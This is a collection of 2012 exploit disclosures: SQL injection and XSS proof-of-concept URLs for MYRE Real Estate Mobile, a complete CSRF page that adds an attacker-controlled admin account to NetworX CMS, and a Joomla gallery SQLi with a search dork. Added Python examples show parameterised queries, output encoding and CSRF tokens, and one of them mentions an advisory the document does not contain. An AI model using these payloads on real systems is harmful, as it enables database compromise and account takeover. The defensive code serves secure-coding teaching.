2012-05-01: Public or Non-Public Disclosure

Status:
========
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
1.1
Multiple remote SQL Injection vulnerabilities are detected in MYREs Real Estate Mobile Application (2012 Q2).
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands
on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located on the link_idd & userid value of the mobile application.

Vulnerable Module(s):
[+] Listings - Link_IDD
[+] Agent Profile - UserID

Picture(s):
../1.png
../2.png

1.2
Multiple non persistent cross site scripting vulnerabilities are detected in MYREs Real Estate Mobile Application (2012 Q2).
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user
interaction or local low privileged user account. Successful exploitation can result in account steal, phishing &
client-side content request manipulation.

Vulnerable Module(s):
[+] Search - bedrooms1
[+] Search - price2

Picture(s):
../3.png
../4.png

Proof of Concept:
=================
1.1
The SQL Injection vulnerabilities can be exploited by a remote attacker without required user interaction.
For demonstration or reproduce ...

PoC:
http://SITE/realestate/1_mobile/listings.php?link_idd=-13+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--%20

http://SITE/realestate/1_mobile/agentprofile.php?userid=16+union+select[SQL-INJECTION!]

1.2
The client side cross site scripting vulnerabilities can be exploited by a remote attacker with medium to high required
user interaction. For demonstration or reproduce ...

PoC:
http://myrephp.com/realestate/1_mobile/search.php?cat_id1=1&city1=fu+&price2=%3E%22%3Ciframe+src%3Dwww.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29+%3C&price1=%3E%22%3Ciframe+src%3Dwww.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29&bedrooms1=1%3E%22%3Ciframe+src%3Dwww.google.com+onload%3Dalert%28%22VL%22%29+%3C&price1=%3E%22%3Ciframe+src%3Dwww.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29&bathrooms1=0.5&order=link_id&sort=DESC&look=1&nolinks1=202-

Risk:
=====
1.1
The security risk of the sql injection vulnerabilities is estimated as critical.

1.2
The security risk of the non persistent cross site scripting vulnerabilities is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim M. El-Sayed (strom () vulnerability-lab com)

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012 Vulnerability-Lab

--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research () vulnerability-lab com

Source: MYRE Real Estate Mobile 2012|2 Multiple Vulnerabilities
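Both the myCare2x and the MYRE advisories above report the same two root causes: request values concatenated into SQL text, and stored or reflected values written into HTML unencoded. The block below is an added example, not code from either product, showing the two fixes side by side with the defects they replace. The `person` table, its rows and the probe strings are constructed here; the probes only copy the shape of the advisory inputs (a stray quote in a numeric id, an `<iframe>` in a name field).

```python
"""Parameterised SQL and HTML output encoding (added example)."""
import html
import sqlite3
from typing import Callable, List, Tuple

Row = Tuple[int, str]

# Constructed probe values
SQLI_PROBE = "-1'"                        # the advisories' -1%27 marker, decoded
TAUTOLOGY_PROBE = "' OR '1'='1"
XSS_PROBE = '"><iframe src=a onload=alert("VL") <'


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's person table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE person (pid INTEGER PRIMARY KEY, name_last TEXT)")
    conn.executemany("INSERT INTO person VALUES (?, ?)", [(403, "Doe"), (596, "Roe")])
    return conn


def find_by_pid_vulnerable(conn: sqlite3.Connection, pid: str) -> List[Row]:
    """String-built statement: request text becomes part of the SQL grammar."""
    sql = "SELECT pid, name_last FROM person WHERE pid = '%s'" % pid
    return conn.execute(sql).fetchall()


def find_by_pid(conn: sqlite3.Connection, pid: str) -> List[Row]:
    """Parameterised statement: the driver binds pid as a value, never as SQL."""
    return conn.execute(
        "SELECT pid, name_last FROM person WHERE pid = ?", (pid,)
    ).fetchall()


def probe_outcome(conn: sqlite3.Connection, pid: str,
                  lookup: Callable[[sqlite3.Connection, str], List[Row]]) -> str:
    """Classify what a lookup does with a hostile pid.

    'error' means the database rejected the statement (the usual tell-tale of
    injectable SQL), 'rows' means rows came back, 'empty' means a clean miss.
    """
    try:
        rows = lookup(conn, pid)
    except sqlite3.DatabaseError:
        return "error"
    return "rows" if rows else "empty"


def render_person_row(pid: int, name_last: str) -> str:
    """Encode every user-controlled value before placing it in HTML."""
    return "<h2>%d: %s</h2>" % (pid, html.escape(name_last, quote=True))


def store_and_render(conn: sqlite3.Connection, pid: int, name_last: str) -> str:
    """Persistent-XSS round trip: store the raw value, encode it on output."""
    conn.execute("INSERT INTO person VALUES (?, ?)", (pid, name_last))
    stored_pid, stored_name = find_by_pid(conn, str(pid))[0]
    return render_person_row(stored_pid, stored_name)


if __name__ == "__main__":
    db = make_db()
    for label, fn in (("vulnerable", find_by_pid_vulnerable), ("parameterised", find_by_pid)):
        print(label, repr(SQLI_PROBE), "->", probe_outcome(db, SQLI_PROBE, fn))
        print(label, repr(TAUTOLOGY_PROBE), "->", probe_outcome(db, TAUTOLOGY_PROBE, fn))
    print(store_and_render(db, 829, XSS_PROBE))
```

The tautology probe is the instructive one: the string-built query returns every row, while the bound parameter is compared as a literal value and matches nothing. On the output side the value is stored untouched and encoded at the point where it meets HTML, which is the only place the encoding rules are known.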
-
NetworX CMS - CSRF Add Admin

# Exploit Title: NetworX CMS - CSRF Add Admin
# Date: 15-April-2012
# Author: N3t.Crack3r
# Software Link: http://www.socialabc.com/downloads/networx-social/
# Version: All Version
# Category:: [Webapps]
# Google dork: powered by networx
# Tested on: [Ubuntu]
# Demo site: http://www.socialabc.com/demo/

<!--
//================================================================================
Greets : Sho0ter , Net_spy , khanisgr8 , CROSS & All Hackw0rms Crew / Members
================================================================================
// Login info : Email : adm@hackw0rms.net pass:t00r
# root@SecBoX:~# cat poc.php
-->
<html>
<head>
<script language="javascript">
function country_changed() {
    document.getElementById('hdnSubmited').value = 'change_country';
    document.getElementById('frmMain').submit();
}
</script>
</head>
<form action="http://<!----- REPLACE HEAR WITH URL ---->/admin/employer.php" form method="post" id="frmMain">
<input type="hidden" name="submited" value="save" id="hdnSubmited">
<br>
<p class="text_14 bold" align="center">NetworX CSRF - Add Admin</p>
<table cellpadding="5" border="0">
<tr>
<td align="right" class="text_12">Email:</td>
<td colspan="3"> <input type="text" name="UserEmail" value="adm@hackw0rms.net"> </td>
</tr>
<tr>
<td align="right" class="text_12">Password:</td>
<td colspan="3"> <input type="password" name="Password" value="t00r"> </td>
</tr>
<tr>
<td align="right" class="text_12">First Name:</td>
<td><input type="text" name="UserFirstname" value="Hack" class="t_box" style="width:150px;"></td>
<td align="right" class="text_12">Last Name:</td>
<td><input type="text" name="UserLastname" value="W0rm" class="t_box" style="width:150px;"></td>
</tr>
<tr>
<td align="right" class="text_12">Country:</td>
<td colspan="3">
<select name="UserCountry" onchange="country_changed()">
<option value="{ID}" {selected}>United state of Islam</option>
</select>
</td>
</tr>
<tr>
<td align="right" class="text_12">Address:</td>
<td colspan="3"> <input type="text" name="UserAddress1" value="69 1337 st" class="t_box" style="width:400px;"> </td>
</tr>
<tr>
<td align="right" class="text_12">City / Town:</td>
<td colspan="3"> <input type="text" name="UserCity" value="system32" class="t_box" style="width:200px;"> </td>
</tr>
<tr>
<td align="right" class="text_12">State / Province:</td>
<td>
<select name="UserState" class="t_box" style="width:100px;">
<option value="{ID}" {selected}>LA</option>
</select>
</td>
<td align="right" class="text_12">Zip Code:</td>
<td><input type="text" name="UserZip" value="31337" class="t_box" style="width:100px;"></td>
</tr>
<tr>
<td align="right" class="text_12">Contact Phone:</td>
<td colspan="3"> <input type="text" name="UserPhone" value="691337" class="t_box" style="width:200px;"> </td>
</tr>
<tr>
<td rowspan="10" valign="top" align="http://<!----- REPLACE HEAR WITH URL ---->/admin/employer.php" class="text_12">Permissions:</td>
<td><input type="checkbox" name="UserPermissions[]" value="1" class="t_box" checked="checked" func_if_true({PermissionCustomers}, 'checked')> User Management Tool</td>
</tr>
<tr>
<td><input type="checkbox" name="UserPermissions[]" value="2" class="t_box" checked="checked" func_if_true({PermissionContent}, 'checked')> Content Management Tool</td>
</tr>
<tr>
<td><input type="checkbox" name="UserPermissions[]" value="4" class="t_box" checked="checked" func_if_true({PermissionStatistics}, 'checked')> Statistics and Reports</td>
</tr>
<tr>
<td><input type="checkbox" name="UserPermissions[]" value="32" class="t_box" checked="checked" func_if_true({PermissionReports}, 'checked')> Complaint and Report Tool</td>
</tr>
</table>
<br>
<!-- buttons start -->
<table width="100%" cellpadding="5" border="0">
<tr>
<td width="80"> </td>
<td align="right"> <input type="submit" name="Save" value="Save" style="width:80px;"> </td>
</tr>
</table>
</form>
</html>

Source: NetworX CMS - CSRF Add Admin
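The post above works because the admin "save" action accepts any POST that carries the right field names, and a browser will attach the admin's session cookie to a form submitted from another site. The block below is an added example, not NetworX code: a synchroniser-token check in which the server mints a random token per session, embeds it in the form it renders, and refuses a state-changing request that does not return it. The `Session` and `Request` classes, the `SITE_ORIGIN` value and the field names are constructed for the example; only the idea of an admin form that creates a privileged account comes from the post.

```python
"""Synchroniser-token CSRF check for a state-changing admin form (added example)."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

SITE_ORIGIN = "https://admin.example.test"   # constructed deployment origin


@dataclass
class Session:
    """Server-side session; the token is minted once per session, never per request."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """The parts of an HTTP request the check needs (constructed)."""
    method: str
    form: Dict[str, str]
    origin: Optional[str] = None   # Origin header; None when the client sent none


def render_admin_form(session: Session) -> str:
    """Server-rendered form carrying the session's token in a hidden field.

    A cross-site page cannot read this value (same-origin policy), so it cannot
    reproduce it in a forged submission.
    """
    return (
        '<form method="post" action="/admin/employer.php">'
        '<input type="hidden" name="submited" value="save">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input type="text" name="UserEmail"> ... '
        '</form>'
    )


def csrf_ok(session: Session, request: Request) -> bool:
    """Accept only POSTs that carry this session's own token."""
    if request.method != "POST":
        return False
    # Defence in depth: a form posted from another site carries that site's Origin.
    if request.origin is not None and request.origin != SITE_ORIGIN:
        return False
    submitted = request.form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be recovered byte by byte from timing.
    return hmac.compare_digest(submitted.encode(), session.csrf_token.encode())


def handle_save(session: Session, request: Request) -> Tuple[str, str]:
    """Returns ('created', email) or ('rejected', reason)."""
    if not csrf_ok(session, request):
        return ("rejected", "missing or invalid CSRF token")
    return ("created", request.form["UserEmail"])


if __name__ == "__main__":
    sess = Session(user="admin")
    # Constructed forged request: the fields a cross-site page can set, no token.
    forged = Request("POST", {"submited": "save", "UserEmail": "attacker@example.test"},
                     origin="https://evil.example.test")
    genuine = Request("POST", {"submited": "save", "UserEmail": "new.admin@example.test",
                               "csrf_token": sess.csrf_token}, origin=SITE_ORIGIN)
    print(handle_save(sess, forged))    # ('rejected', 'missing or invalid CSRF token')
    print(handle_save(sess, genuine))   # ('created', 'new.admin@example.test')
```

The Origin check alone is not sufficient, because some clients omit the header, which is why it only rejects on a mismatch and the token remains the deciding check. Marking the session cookie `SameSite=Lax` or `Strict` adds a third, independent layer at the browser.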
-
joomla component (com_ponygallery) SQL injection Vulnerability

##################################################
# Exploit Title: joomla component (com_ponygallery) SQL injection Vulnerability
# Download : http://www.adyawinsa.com/index.php/remository?func=fileinfo&id=2
# Date: 11/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Google dork: inurl:"com_ponygallery"
##################################################

[~]Exploit/p0c :

http://www.site.com/index.php?option=com_ponygallery&Itemid=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team - DiosdelaRed - RemoteExecution ] [ Dedalo - Maztor ]

Source: joomla component (com_ponygallery) SQL injection Vulnerability